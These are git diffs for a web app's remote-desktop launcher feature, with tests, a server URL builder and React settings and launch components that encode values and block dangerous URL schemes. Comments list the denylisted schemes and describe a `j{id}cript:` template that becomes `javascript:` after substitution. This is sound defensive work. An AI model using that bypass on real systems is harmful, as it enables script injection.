+};
+
+describe('buildRemoteAccessLaunchUrl', () => {
+  it('substitutes {id} and {password} into a custom-scheme template', () => {
+    const url = buildRemoteAccessLaunchUrl(
+      { customFields: { rustdesk_id: '294064193' } },
+      rustdeskSettings,
+    );
+    expect(url).toBe('rustdesk://294064193?password=plain');
+  });
+
+  it('passes through templates with no {password} placeholder (e.g. ScreenConnect HTTPS launcher)', () => {
+    const sc: InheritableRemoteAccessSettings = {
+      defaultProviderId: 'sc',
+      providers: [
+        {
+          id: 'sc',
+          name: 'ScreenConnect',
+          urlTemplate: 'https://acme.screenconnect.com/Host#Access///{id}/Join',
+          customFieldKey: 'sc_session_id',
+          enabled: true,
+        },
+      ],
+    };
+    const url = buildRemoteAccessLaunchUrl(
+      { customFields: { sc_session_id: '0b58bbd8-0102-479b-a42c-84245fb164db' } },
+      sc,
+    );
+    expect(url).toBe('https://acme.screenconnect.com/Host#Access///0b58bbd8-0102-479b-a42c-84245fb164db/Join');
+  });
+
+  it('substitutes empty string when password is unset and template references {password}', () => {
+    const noPw: InheritableRemoteAccessSettings = {
+      ...rustdeskSettings,
+      providers: [{ ...baseProvider, password: undefined }],
+    };
+    const url = buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '42' } }, noPw);
+    expect(url).toBe('rustdesk://42?password=');
+  });
+
+  it('percent-encodes URL-reserved characters in the password (#, &, =, +, etc.)', () => {
+    const tricky: InheritableRemoteAccessSettings = {
+      ...rustdeskSettings,
+      providers: [
+        {
+          ...baseProvider,
+          password: 'a#b&c=d+e<f>g{h}i(j)k',
+        },
+      ],
+    };
+    const url = buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: 'X' } }, tricky);
+    expect(url).toBe(
+      'rustdesk://X?password=a%23b%26c%3Dd%2Be%3Cf%3Eg%7Bh%7Di(j)k',
+    );
+  });
+
+  it('percent-encodes the device id (defends against ids with reserved characters)', () => {
+    const url = buildRemoteAccessLaunchUrl(
+      { customFields: { rustdesk_id: 'has space&amp' } },
+      rustdeskSettings,
+    );
+    expect(url).toBe('rustdesk://has%20space%26amp?password=plain');
+  });
+
+  it('substitutes every occurrence of {id} (replaceAll, not just the first)', () => {
+    const dup: InheritableRemoteAccessSettings = {
+      defaultProviderId: 'dup',
+      providers: [
+        {
+          id: 'dup',
+          name: 'Echo',
+          urlTemplate: 'https://example.com/{id}/redirect-to/{id}',
+          customFieldKey: 'k',
+          enabled: true,
+        },
+      ],
+    };
+    const url = buildRemoteAccessLaunchUrl({ customFields: { k: 'X' } }, dup);
+    expect(url).toBe('https://example.com/X/redirect-to/X');
+  });
+
+  it('returns null when no provider is configured', () => {
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '1' } }, undefined),
+    ).toBeNull();
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '1' } }, {}),
+    ).toBeNull();
+  });
+
+  it('returns null when default provider is unknown or disabled', () => {
+    expect(
+      buildRemoteAccessLaunchUrl(
+        { customFields: { rustdesk_id: '1' } },
+        { ...rustdeskSettings, defaultProviderId: 'nonexistent' },
+      ),
+    ).toBeNull();
+
+    const disabled: InheritableRemoteAccessSettings = {
+      ...rustdeskSettings,
+      providers: [{ ...baseProvider, enabled: false }],
+    };
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '1' } }, disabled),
+    ).toBeNull();
+  });
+
+  it('returns null when device is missing the configured custom field', () => {
+    expect(buildRemoteAccessLaunchUrl({ customFields: null }, rustdeskSettings)).toBeNull();
+    expect(buildRemoteAccessLaunchUrl({ customFields: {} }, rustdeskSettings)).toBeNull();
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '' } }, rustdeskSettings),
+    ).toBeNull();
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: 42 as unknown as string } }, rustdeskSettings),
+    ).toBeNull();
+  });
+
+  it('returns null when urlTemplate is empty', () => {
+    const empty: InheritableRemoteAccessSettings = {
+      ...rustdeskSettings,
+      providers: [{ ...baseProvider, urlTemplate: '' }],
+    };
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '1' } }, empty),
+    ).toBeNull();
+  });
+});

--- a/apps/api/src/services/remoteAccessLauncher.ts
+++ b/apps/api/src/services/remoteAccessLauncher.ts
@@ -1,4 +1,5 @@
 import type { InheritableRemoteAccessSettings, RemoteAccessProvider } from '@breeze/shared';
+import { isAllowedLauncherScheme } from '@breeze/shared';
 
 // Build the launch URL the Connect Desktop button should fire for a device,
 // based on the partner's configured remote-access providers and the device's
@@ -31,7 +32,15 @@ export function buildRemoteAccessLaunchUrl(
   if (typeof idValue !== 'string' || idValue.length === 0) return null;
   if (!provider.urlTemplate) return null;
 
-  return provider.urlTemplate
+  const built = provider.urlTemplate
     .replaceAll('{id}', encodeURIComponent(idValue))
     .replaceAll('{password}', encodeURIComponent(provider.password ?? ''));
+
+  // Belt-and-suspenders: re-check the scheme on the *substituted* URL. The
+  // input validator at orgs.ts already rejects disallowed-scheme templates,
+  // but a template like `j{id}cript:foo` passes the template-time check
+  // (scheme is `j`, not denylisted) and only resolves to `javascript:` after
+  // the device id is substituted. Refuse to return such a URL.
+  if (!isAllowedLauncherScheme(built)) return null;
+  return built;
 }

--- a/apps/api/src/services/remoteAccessLauncher.ts
+++ b/apps/api/src/services/remoteAccessLauncher.ts
@@ -1,6 +1,30 @@
 import type { InheritableRemoteAccessSettings, RemoteAccessProvider } from '@breeze/shared';
 import { isAllowedLauncherScheme } from '@breeze/shared';
 
+// Reasons we may decline to produce a launch URL. These are surfaced to the UI
+// so it can distinguish expected-empty from configuration error from a security
+// event (so a tampered partner template that resolves to javascript: at
+// substitution time shows up loudly instead of silently falling back).
+export type RemoteAccessLaunchSkipReason =
+  | 'no_provider_configured'
+  | 'provider_disabled'
+  | 'missing_device_identifier'
+  | 'empty_url_template'
+  | 'scheme_not_allowed';
+
+export interface RemoteAccessLaunchResult {
+  launchUrl: string | null;
+  providerId: string | null;
+  scheme: string | null;
+  skipReason: RemoteAccessLaunchSkipReason | null;
+}
+
+function extractScheme(url: string): string | null {
+  const colon = url.indexOf(':');
+  if (colon <= 0) return null;
+  return url.slice(0, colon).toLowerCase();
+}
+
 // Build the launch URL the Connect Desktop button should fire for a device,
 // based on the partner's configured remote-access providers and the device's
 // custom_fields. Returns null when no provider is configured, no default is
@@ -20,17 +44,38 @@ export function buildRemoteAccessLaunchUrl(
   device: { customFields?: Record<string, unknown> | null },
   remoteAccess: InheritableRemoteAccessSettings | undefined | null,
 ): string | null {
+  return resolveRemoteAccessLaunch(device, remoteAccess).launchUrl;
+}
+
+// Resolves the launch URL with a structured result so callers can distinguish
+// between "no provider configured" (expected), "missing device identifier"
+// (configuration), and "scheme not allowed at substitution time" (potential
+// security event: the partner template was tampered to resolve to a
+// disallowed scheme only after substitution).
+export function resolveRemoteAccessLaunch(
+  device: { customFields?: Record<string, unknown> | null },
+  remoteAccess: InheritableRemoteAccessSettings | undefined | null,
+): RemoteAccessLaunchResult {
   if (!remoteAccess?.defaultProviderId || !remoteAccess.providers?.length) {
-    return null;
+    return { launchUrl: null, providerId: null, scheme: null, skipReason: 'no_provider_configured' };
   }
   const provider: RemoteAccessProvider | undefined = remoteAccess.providers.find(
-    (p) => p.id === remoteAccess.defaultProviderId && p.enabled,
+    (p) => p.id === remoteAccess.defaultProviderId,
   );
-  if (!provider) return null;
+  if (!provider) {
+    return { launchUrl: null, providerId: null, scheme: null, skipReason: 'no_provider_configured' };
+  }
+  if (!provider.enabled) {
+    return { launchUrl: null, providerId: provider.id, scheme: null, skipReason: 'provider_disabled' };
+  }
 
   const idValue = device.customFields?.[provider.customFieldKey];
-  if (typeof idValue !== 'string' || idValue.length === 0) return null;
-  if (!provider.urlTemplate) return null;
+  if (typeof idValue !== 'string' || idValue.length === 0) {
+    return { launchUrl: null, providerId: provider.id, scheme: null, skipReason: 'missing_device_identifier' };
+  }
+  if (!provider.urlTemplate) {
+    return { launchUrl: null, providerId: provider.id, scheme: null, skipReason: 'empty_url_template' };
+  }
 
   const built = provider.urlTemplate
     .replaceAll('{id}', encodeURIComponent(idValue))
@@ -41,6 +86,8 @@ export function buildRemoteAccessLaunchUrl(
   // but a template like `j{id}cript:foo` passes the template-time check
   // (scheme is `j`, not denylisted) and only resolves to `javascript:` after
   // the device id is substituted. Refuse to return such a URL.
-  if (!isAllowedLauncherScheme(built)) return null;
-  return built;
+  if (!isAllowedLauncherScheme(built)) {
+    return { launchUrl: null, providerId: provider.id, scheme: null, skipReason: 'scheme_not_allowed' };
+  }
+  return { launchUrl: built, providerId: provider.id, scheme: extractScheme(built), skipReason: null };
 }

--- a/apps/api/src/services/remoteAccessLauncher.ts
+++ b/apps/api/src/services/remoteAccessLauncher.ts
@@ -1,0 +1,37 @@
+import type { InheritableRemoteAccessSettings, RemoteAccessProvider } from '@breeze/shared';
+
+// Build the launch URL the Connect Desktop button should fire for a device,
+// based on the partner's configured remote-access providers and the device's
+// custom_fields. Returns null when no provider is configured, no default is
+// chosen, the chosen provider is disabled, or the device is missing the
+// per-device identifier the provider needs.
+//
+// Substitutes `{id}` and `{password}` placeholders in `urlTemplate` with the
+// percent-encoded values, defending against URL-reserved characters
+// (#, &, =, +, <, >, etc.) in MSP-set preset passwords or device identifiers.
+//
+// Examples (with device.customFields.rustdesk_id = '294064193'):
+//   urlTemplate 'rustdesk://{id}?password={password}', password 'p#x'
+//     → 'rustdesk://294064193?password=p%23x'
+//   urlTemplate 'https://acme.screenconnect.com/Host#Access///{id}/Join'
+//     → 'https://acme.screenconnect.com/Host#Access///294064193/Join'
+export function buildRemoteAccessLaunchUrl(
+  device: { customFields?: Record<string, unknown> | null },
+  remoteAccess: InheritableRemoteAccessSettings | undefined | null,
+): string | null {
+  if (!remoteAccess?.defaultProviderId || !remoteAccess.providers?.length) {
+    return null;
+  }
+  const provider: RemoteAccessProvider | undefined = remoteAccess.providers.find(
+    (p) => p.id === remoteAccess.defaultProviderId && p.enabled,
+  );
+  if (!provider) return null;
+
+  const idValue = device.customFields?.[provider.customFieldKey];
+  if (typeof idValue !== 'string' || idValue.length === 0) return null;
+  if (!provider.urlTemplate) return null;
+
+  return provider.urlTemplate
+    .replaceAll('{id}', encodeURIComponent(idValue))
+    .replaceAll('{password}', encodeURIComponent(provider.password ?? ''));
+}

--- a/apps/web/src/components/remote/ConnectDesktopButton.tsx
+++ b/apps/web/src/components/remote/ConnectDesktopButton.tsx
@@ -112,14 +112,38 @@ export default function ConnectDesktopButton({ deviceId, className = '', compact
       // WebRTC is now available. Re-fetch the device record right before
       // deciding so the click always uses fresh state.
       let liveDesktopAccess: DesktopAccessState | null = desktopAccess ?? null;
+      let remoteAccessLaunchUrl: string | null = null;
       try {
         const devRes = await fetchWithAuth(`/devices/${deviceId}`);
         if (devRes.ok) {
-          const devBody = await devRes.json() as { desktopAccess?: DesktopAccessState | null };
+          const devBody = await devRes.json() as {
+            desktopAccess?: DesktopAccessState | null;
+            remoteAccessLaunchUrl?: string | null;
+          };
           liveDesktopAccess = devBody.desktopAccess ?? null;
+          remoteAccessLaunchUrl = devBody.remoteAccessLaunchUrl ?? null;
         }
       } catch {
         // Network blip — fall back to the prop so the connect flow still runs.
+      }
+
+      // If the partner has configured a third-party remote-tool provider
+      // (RustDesk, ScreenConnect, TeamViewer, etc.) and this device has the
+      // matching per-device identifier in its custom_fields, the API has
+      // already built the launch URL with any preset password substituted
+      // and percent-encoded. Auto-detect launch mode by URL prefix:
+      //   - http(s):// → open in a new browser tab (ScreenConnect, web-launchers)
+      //   - any other scheme → hand off to the OS protocol handler (RustDesk, etc.)
+      // Either way, skip the built-in WebRTC desktop flow.
+      if (remoteAccessLaunchUrl) {
+        setStatus('launching');
+        if (/^https?:\/\//i.test(remoteAccessLaunchUrl)) {
+          window.open(remoteAccessLaunchUrl, '_blank', 'noopener,noreferrer');
+        } else {
+          tryDeepLink(remoteAccessLaunchUrl);
+        }
+        setTimeout(() => setStatus('idle'), 1500);
+        return;
       }
 
       // Auto-detect: fall back to VNC when the WebRTC path can't work but VNC relay is enabled.

--- a/apps/web/src/components/remote/ConnectDesktopButton.tsx
+++ b/apps/web/src/components/remote/ConnectDesktopButton.tsx
@@ -1,6 +1,7 @@
 import { useState, useCallback, useRef, useEffect } from 'react';
 import { Monitor, MonitorOff, ExternalLink, Download, X, Globe } from 'lucide-react';
 import type { DesktopAccessState, RemoteAccessPolicy } from '@breeze/shared';
+import { isAllowedLauncherScheme } from '@breeze/shared';
 import { fetchWithAuth } from '@/stores/auth';
 import { getViewerDownloadInfo, getAllViewerDownloads } from '@/lib/viewerDownload';
 import { buildRemoteVncPageUrl } from '@/lib/remoteTunnelUrls';
@@ -135,7 +136,13 @@ export default function ConnectDesktopButton({ deviceId, className = '', compact
       //   - http(s):// → open in a new browser tab (ScreenConnect, web-launchers)
       //   - any other scheme → hand off to the OS protocol handler (RustDesk, etc.)
       // Either way, skip the built-in WebRTC desktop flow.
-      if (remoteAccessLaunchUrl) {
+      //
+      // Defense in depth: the API validator rejects javascript:, data:,
+      // vbscript:, file:, etc. at write time, but we re-check the scheme on
+      // the client before firing so a stale row from a pre-validator era,
+      // a future API regression, or a tampered response can't execute a
+      // hostile scheme in the partner's origin.
+      if (remoteAccessLaunchUrl && isAllowedLauncherScheme(remoteAccessLaunchUrl)) {
         setStatus('launching');
         if (/^https?:\/\//i.test(remoteAccessLaunchUrl)) {
           window.open(remoteAccessLaunchUrl, '_blank', 'noopener,noreferrer');
@@ -144,6 +151,10 @@ export default function ConnectDesktopButton({ deviceId, className = '', compact
         }
         setTimeout(() => setStatus('idle'), 1500);
         return;
+      } else if (remoteAccessLaunchUrl) {
+        // URL came back with a disallowed scheme — fall through to the
+        // built-in WebRTC flow rather than fire something dangerous.
+        console.warn('[ConnectDesktop] Refusing to fire remote-access URL with disallowed scheme; falling back to built-in.');
       }
 
       // Auto-detect: fall back to VNC when the WebRTC path can't work but VNC relay is enabled.

--- a/apps/web/src/components/remote/ConnectDesktopButton.tsx
+++ b/apps/web/src/components/remote/ConnectDesktopButton.tsx
@@ -198,8 +198,23 @@ export default function ConnectDesktopButton({ deviceId, className = '', compact
           setStatus('idle');
           return;
         }
-        // Non-OK, non-422 (e.g., 404 stale UI, 500). Fall through to the
-        // built-in WebRTC flow so the device is still reachable.
+        // Non-OK, non-422. Fail loudly to match the 422 path's "config
+        // visibility over network-blip tolerance" framing. A 500 most
+        // likely indicates a partner DB lookup error the admin needs to
+        // see; a 404 means the device record changed since this UI
+        // loaded and the user should refresh. In both cases, falling
+        // through to WebRTC would mask the real failure mode.
+        Sentry.captureMessage(
+          'Remote-access launcher POST failed unexpectedly',
+          { level: 'warning', extra: { deviceId, status: launchRes.status } },
+        );
+        const friendly = launchRes.status === 404
+          ? 'Remote launch failed: device record changed. Please refresh and try again.'
+          : 'Remote launch failed: server error. Please contact your administrator.';
+        showToast({ type: 'error', message: friendly });
+        setError(`Remote launch failed (HTTP ${launchRes.status})`);
+        setStatus('idle');
+        return;
       }
 
       // Auto-detect: fall back to VNC when the WebRTC path can't work but VNC relay is enabled.

--- a/apps/web/src/components/remote/ConnectDesktopButton.tsx
+++ b/apps/web/src/components/remote/ConnectDesktopButton.tsx
@@ -1,11 +1,13 @@
 import { useState, useCallback, useRef, useEffect } from 'react';
 import { Monitor, MonitorOff, ExternalLink, Download, X, Globe } from 'lucide-react';
+import * as Sentry from '@sentry/astro';
 import type { DesktopAccessState, RemoteAccessPolicy } from '@breeze/shared';
 import { isAllowedLauncherScheme } from '@breeze/shared';
 import { fetchWithAuth } from '@/stores/auth';
 import { getViewerDownloadInfo, getAllViewerDownloads } from '@/lib/viewerDownload';
 import { buildRemoteVncPageUrl } from '@/lib/remoteTunnelUrls';
 import { extractApiError } from '@/lib/apiError';
+import { showToast } from '@/components/shared/Toast';
 
 interface Props {
   deviceId: string;
@@ -113,16 +115,16 @@ export default function ConnectDesktopButton({ deviceId, className = '', compact
       // WebRTC is now available. Re-fetch the device record right before
       // deciding so the click always uses fresh state.
       let liveDesktopAccess: DesktopAccessState | null = desktopAccess ?? null;
-      let remoteAccessLaunchUrl: string | null = null;
+      let hasRemoteAccessLauncher = false;
       try {
         const devRes = await fetchWithAuth(`/devices/${deviceId}`);
         if (devRes.ok) {
           const devBody = await devRes.json() as {
             desktopAccess?: DesktopAccessState | null;
-            remoteAccessLaunchUrl?: string | null;
+            hasRemoteAccessLauncher?: boolean;
           };
           liveDesktopAccess = devBody.desktopAccess ?? null;
-          remoteAccessLaunchUrl = devBody.remoteAccessLaunchUrl ?? null;
+          hasRemoteAccessLauncher = devBody.hasRemoteAccessLauncher === true;
         }
       } catch {
         // Network blip — fall back to the prop so the connect flow still runs.
@@ -130,31 +132,74 @@ export default function ConnectDesktopButton({ deviceId, className = '', compact
 
       // If the partner has configured a third-party remote-tool provider
       // (RustDesk, ScreenConnect, TeamViewer, etc.) and this device has the
-      // matching per-device identifier in its custom_fields, the API has
-      // already built the launch URL with any preset password substituted
-      // and percent-encoded. Auto-detect launch mode by URL prefix:
+      // matching per-device identifier in its custom_fields, request the
+      // one-shot launch URL from POST /devices/:id/remote-access-launch.
+      // The URL (with any preset password substituted and percent-encoded)
+      // is never embedded in the GET response so we only get it back in
+      // response to an explicit click. Each issuance is audited server-side.
+      //
+      // Auto-detect launch mode by URL prefix:
       //   - http(s):// → open in a new browser tab (ScreenConnect, web-launchers)
       //   - any other scheme → hand off to the OS protocol handler (RustDesk, etc.)
       // Either way, skip the built-in WebRTC desktop flow.
       //
-      // Defense in depth: the API validator rejects javascript:, data:,
-      // vbscript:, file:, etc. at write time, but we re-check the scheme on
-      // the client before firing so a stale row from a pre-validator era,
-      // a future API regression, or a tampered response can't execute a
-      // hostile scheme in the partner's origin.
-      if (remoteAccessLaunchUrl && isAllowedLauncherScheme(remoteAccessLaunchUrl)) {
-        setStatus('launching');
-        if (/^https?:\/\//i.test(remoteAccessLaunchUrl)) {
-          window.open(remoteAccessLaunchUrl, '_blank', 'noopener,noreferrer');
-        } else {
-          tryDeepLink(remoteAccessLaunchUrl);
+      // Defense in depth: the API rejects javascript:, data:, vbscript:,
+      // file:, etc. at write time AND re-checks the substituted URL before
+      // returning 422. We still re-check on the client so a tampered
+      // response can't execute a hostile scheme in the partner's origin.
+      if (hasRemoteAccessLauncher) {
+        const launchRes = await fetchWithAuth(`/devices/${deviceId}/remote-access-launch`, {
+          method: 'POST',
+        });
+
+        if (launchRes.status === 422) {
+          // Server detected a tampered template that resolved to a
+          // disallowed scheme after substitution. The server already
+          // emitted an audit event and Sentry capture. Surface a loud
+          // user-facing error rather than silently falling back.
+          const body = await launchRes.json().catch(() => ({} as { code?: string }));
+          Sentry.captureMessage(
+            'Remote-access launcher rejected by scheme policy',
+            { level: 'warning', extra: { deviceId, code: body?.code } },
+          );
+          showToast({
+            type: 'error',
+            message: 'Remote launch unavailable: security check failed. Please contact your administrator.',
+          });
+          setError('Remote launch blocked by security policy');
+          setStatus('idle');
+          return;
         }
-        setTimeout(() => setStatus('idle'), 1500);
-        return;
-      } else if (remoteAccessLaunchUrl) {
-        // URL came back with a disallowed scheme — fall through to the
-        // built-in WebRTC flow rather than fire something dangerous.
-        console.warn('[ConnectDesktop] Refusing to fire remote-access URL with disallowed scheme; falling back to built-in.');
+
+        if (launchRes.ok) {
+          const body = await launchRes.json() as { launchUrl?: string; scheme?: string };
+          const url = body?.launchUrl;
+          if (typeof url === 'string' && isAllowedLauncherScheme(url)) {
+            setStatus('launching');
+            if (/^https?:\/\//i.test(url)) {
+              window.open(url, '_blank', 'noopener,noreferrer');
+            } else {
+              tryDeepLink(url);
+            }
+            setTimeout(() => setStatus('idle'), 1500);
+            return;
+          }
+          // Defense in depth: server should have returned 422, but the
+          // URL we got back has a disallowed scheme. Refuse the click.
+          Sentry.captureMessage(
+            'Remote-access launcher returned disallowed scheme client-side',
+            { level: 'warning', extra: { deviceId } },
+          );
+          showToast({
+            type: 'error',
+            message: 'Remote launch unavailable: security check failed. Please contact your administrator.',
+          });
+          setError('Remote launch blocked by security policy');
+          setStatus('idle');
+          return;
+        }
+        // Non-OK, non-422 (e.g., 404 stale UI, 500). Fall through to the
+        // built-in WebRTC flow so the device is still reachable.
       }
 
       // Auto-detect: fall back to VNC when the WebRTC path can't work but VNC relay is enabled.

--- a/apps/web/src/components/settings/PartnerRemoteAccessTab.tsx
+++ b/apps/web/src/components/settings/PartnerRemoteAccessTab.tsx
@@ -1,0 +1,242 @@
+import { useCallback } from 'react';
+import { Plus, Trash2, MonitorPlay, Eye, EyeOff } from 'lucide-react';
+import { useState } from 'react';
+import type { InheritableRemoteAccessSettings, RemoteAccessProvider } from '@breeze/shared';
+
+type Props = {
+  data: InheritableRemoteAccessSettings;
+  onChange: (data: InheritableRemoteAccessSettings) => void;
+};
+
+function makeProviderId(): string {
+  return `provider-${Math.random().toString(36).slice(2, 10)}`;
+}
+
+function emptyProvider(): RemoteAccessProvider {
+  return {
+    id: makeProviderId(),
+    name: '',
+    urlTemplate: '',
+    customFieldKey: '',
+    password: '',
+    enabled: true,
+  };
+}
+
+const TEMPLATE_PLACEHOLDER_HINT =
+  'Use {id} for the per-device value pulled from custom fields, and {password} for the preset password. Examples: rustdesk://{id}?password={password} (custom protocol) — https://acme.screenconnect.com/Host#Access///{id}/Join (HTTPS, opens in a new tab).';
+
+export default function PartnerRemoteAccessTab({ data, onChange }: Props) {
+  const providers = data.providers ?? [];
+  const defaultProviderId = data.defaultProviderId ?? '';
+  const [revealPassword, setRevealPassword] = useState<Record<string, boolean>>({});
+
+  const updateProvider = useCallback(
+    (idx: number, patch: Partial<RemoteAccessProvider>) => {
+      const next = [...providers];
+      next[idx] = { ...next[idx], ...patch };
+      onChange({ ...data, providers: next });
+    },
+    [providers, data, onChange],
+  );
+
+  const addProvider = () => {
+    // Don't auto-promote the new provider to default — adding a provider
+    // shouldn't silently switch the partner off the built-in launcher.
+    // The user picks the default explicitly via the radio.
+    onChange({ ...data, providers: [...providers, emptyProvider()] });
+  };
+
+  const removeProvider = (idx: number) => {
+    const removed = providers[idx];
+    const next = providers.filter((_, i) => i !== idx);
+    // If we removed the current default, fall back to built-in (empty default)
+    // rather than silently picking another provider.
+    const nextDefault = removed.id === defaultProviderId ? '' : defaultProviderId;
+    onChange({ ...data, providers: next, defaultProviderId: nextDefault });
+  };
+
+  const setDefault = (id: string) => {
+    onChange({ ...data, defaultProviderId: id });
+  };
+
+  return (
+    <div className="space-y-6">
+      <div className="flex items-start justify-between gap-4">
+        <div>
+          <div className="flex items-center gap-2">
+            <MonitorPlay className="h-5 w-5 text-muted-foreground" />
+            <h2 className="text-lg font-semibold">Remote-Tool Providers</h2>
+          </div>
+          <p className="mt-1 text-sm text-muted-foreground">
+            Configure third-party remote-desktop tools (RustDesk, TeamViewer, AnyDesk, etc.)
+            to launch when users click <span className="font-medium">Connect Desktop</span> on a
+            device. Each device needs the matching per-device identifier set in its custom
+            fields under the configured key. Without a default provider, the built-in WebRTC
+            desktop session is used.
+          </p>
+        </div>
+        <button
+          type="button"
+          onClick={addProvider}
+          className="inline-flex shrink-0 items-center gap-1.5 rounded-md border bg-background px-3 py-1.5 text-sm font-medium hover:bg-muted"
+        >
+          <Plus className="h-4 w-4" />
+          Add provider
+        </button>
+      </div>
+
+      {/* Built-in option — selecting this falls the Connect Desktop button
+          back to Breeze's bundled WebRTC desktop session. Always present so
+          users can return to the default once they've added providers. */}
+      <div
+        className={`rounded-lg border p-4 ${!defaultProviderId ? 'border-primary bg-primary/5' : ''}`}
+      >
+        <label className="flex items-center gap-2 text-sm font-medium">
+          <input
+            type="radio"
+            name="defaultProvider"
+            checked={!defaultProviderId}
+            onChange={() => onChange({ ...data, defaultProviderId: '' })}
+            className="h-4 w-4"
+          />
+          Built-in (Breeze WebRTC desktop session)
+        </label>
+        <p className="mt-1 ml-6 text-xs text-muted-foreground">
+          The default. Connect Desktop opens an in-browser WebRTC session to
+          the device. No third-party tool involved.
+        </p>
+      </div>
+
+      {providers.length === 0 ? (
+        <div className="rounded-md border border-dashed bg-muted/40 p-6 text-center text-sm text-muted-foreground">
+          No additional remote-tool providers configured. Click <span className="font-medium">Add provider</span> to integrate RustDesk, ScreenConnect, TeamViewer, etc.
+        </div>
+      ) : (
+        <div className="space-y-3">
+          {providers.map((p, idx) => {
+            const templateError =
+              p.urlTemplate.length > 0 && !/^[a-zA-Z][a-zA-Z0-9+.\-]*:/.test(p.urlTemplate)
+                ? 'URL template must start with a scheme followed by a colon (e.g. rustdesk:, https:)'
+                : null;
+            const isDefault = p.id === defaultProviderId;
+            return (
+              <div
+                key={p.id}
+                className={`rounded-lg border p-4 ${isDefault ? 'border-primary bg-primary/5' : ''}`}
+              >
+                <div className="mb-3 flex items-center gap-3">
+                  <label className="flex items-center gap-2 text-sm font-medium">
+                    <input
+                      type="radio"
+                      name="defaultProvider"
+                      checked={isDefault}
+                      onChange={() => setDefault(p.id)}
+                      className="h-4 w-4"
+                    />
+                    Default
+                  </label>
+                  <label className="flex items-center gap-2 text-sm">
+                    <input
+                      type="checkbox"
+                      checked={p.enabled}
+                      onChange={(e) => updateProvider(idx, { enabled: e.target.checked })}
+                      className="h-4 w-4 rounded border"
+                    />
+                    Enabled
+                  </label>
+                  <div className="ml-auto" />
+                  <button
+                    type="button"
+                    onClick={() => removeProvider(idx)}
+                    title="Remove provider"
+                    className="inline-flex h-8 w-8 items-center justify-center rounded-md text-muted-foreground hover:bg-destructive/10 hover:text-destructive"
+                  >
+                    <Trash2 className="h-4 w-4" />
+                  </button>
+                </div>
+
+                <div className="grid gap-4 sm:grid-cols-2">
+                  <div className="space-y-1">
+                    <label className="text-sm font-medium">Display name</label>
+                    <input
+                      type="text"
+                      value={p.name}
+                      placeholder="e.g. RustDesk"
+                      onChange={(e) => updateProvider(idx, { name: e.target.value })}
+                      className="h-10 w-full rounded-md border bg-background px-3 text-sm"
+                    />
+                  </div>
+
+                  <div className="space-y-1 sm:col-span-2">
+                    <label className="text-sm font-medium">URL template</label>
+                    <input
+                      type="text"
+                      value={p.urlTemplate}
+                      placeholder="rustdesk://{id}?password={password}"
+                      onChange={(e) => updateProvider(idx, { urlTemplate: e.target.value })}
+                      className={`h-10 w-full rounded-md border bg-background px-3 text-sm font-mono ${templateError ? 'border-destructive' : ''}`}
+                    />
+                    {templateError ? (
+                      <p className="text-xs text-destructive">{templateError}</p>
+                    ) : (
+                      <p className="text-xs text-muted-foreground">{TEMPLATE_PLACEHOLDER_HINT}</p>
+                    )}
+                  </div>
+
+                  <div className="space-y-1">
+                    <label className="text-sm font-medium">Custom field key</label>
+                    <input
+                      type="text"
+                      value={p.customFieldKey}
+                      placeholder="e.g. rustdesk_id"
+                      onChange={(e) => updateProvider(idx, { customFieldKey: e.target.value })}
+                      className="h-10 w-full rounded-md border bg-background px-3 text-sm"
+                    />
+                    <p className="text-xs text-muted-foreground">
+                      Key under <code>device.custom_fields</code> holding the per-device identifier
+                      (e.g. RustDesk ID).
+                    </p>
+                  </div>
+
+                  <div className="space-y-1">
+                    <label className="text-sm font-medium">
+                      Preset password <span className="text-muted-foreground font-normal">(optional)</span>
+                    </label>
+                    <div className="relative">
+                      <input
+                        type={revealPassword[p.id] ? 'text' : 'password'}
+                        value={p.password ?? ''}
+                        onChange={(e) => updateProvider(idx, { password: e.target.value })}
+                        placeholder="Leave blank if the tool prompts on connect"
+                        className="h-10 w-full rounded-md border bg-background px-3 pr-10 text-sm font-mono"
+                      />
+                      <button
+                        type="button"
+                        onClick={() =>
+                          setRevealPassword((prev) => ({ ...prev, [p.id]: !prev[p.id] }))
+                        }
+                        className="absolute right-2 top-1/2 -translate-y-1/2 inline-flex h-6 w-6 items-center justify-center rounded text-muted-foreground hover:bg-muted"
+                        title={revealPassword[p.id] ? 'Hide password' : 'Show password'}
+                      >
+                        {revealPassword[p.id] ? (
+                          <EyeOff className="h-3.5 w-3.5" />
+                        ) : (
+                          <Eye className="h-3.5 w-3.5" />
+                        )}
+                      </button>
+                    </div>
+                    <p className="text-xs text-muted-foreground">
+                      URL-reserved characters are percent-encoded automatically. Saved server-side
+                      in partner settings; never embedded in the web bundle.
+                    </p>
+                  </div>
+                </div>
+              </div>
+            );
+          })}
+        </div>
+      )}
+    </div>
+  );
+}

--- a/apps/web/src/components/settings/PartnerSettingsPage.tsx
+++ b/apps/web/src/components/settings/PartnerSettingsPage.tsx
@@ -16,6 +16,7 @@ import PartnerEventLogsTab from './PartnerEventLogsTab';
 import PartnerDefaultsTab from './PartnerDefaultsTab';
 import PartnerBrandingTab from './PartnerBrandingTab';
 import PartnerAiBudgetsTab from './PartnerAiBudgetsTab';
+import PartnerRemoteAccessTab from './PartnerRemoteAccessTab';
 import PartnerCompanyTab from './PartnerCompanyTab';
 import { showToast } from '../shared/Toast';
 import type {
@@ -29,11 +30,12 @@ import type {
   InheritableEventLogSettings,
   InheritableDefaultSettings,
   InheritableBrandingSettings,
-  InheritableAiBudgetSettings
+  InheritableAiBudgetSettings,
+  InheritableRemoteAccessSettings
 } from '@breeze/shared';
 import { navigateTo } from '@/lib/navigation';
 
-type TabKey = 'company' | 'regional' | 'security' | 'notifications' | 'eventLogs' | 'defaults' | 'branding' | 'aiBudgets';
+type TabKey = 'company' | 'regional' | 'security' | 'notifications' | 'eventLogs' | 'defaults' | 'branding' | 'aiBudgets' | 'remoteAccess';
 
 type Partner = {
   id: string;
@@ -54,6 +56,7 @@ const TABS: { key: TabKey; label: string }[] = [
   { key: 'defaults', label: 'Defaults' },
   { key: 'branding', label: 'Branding' },
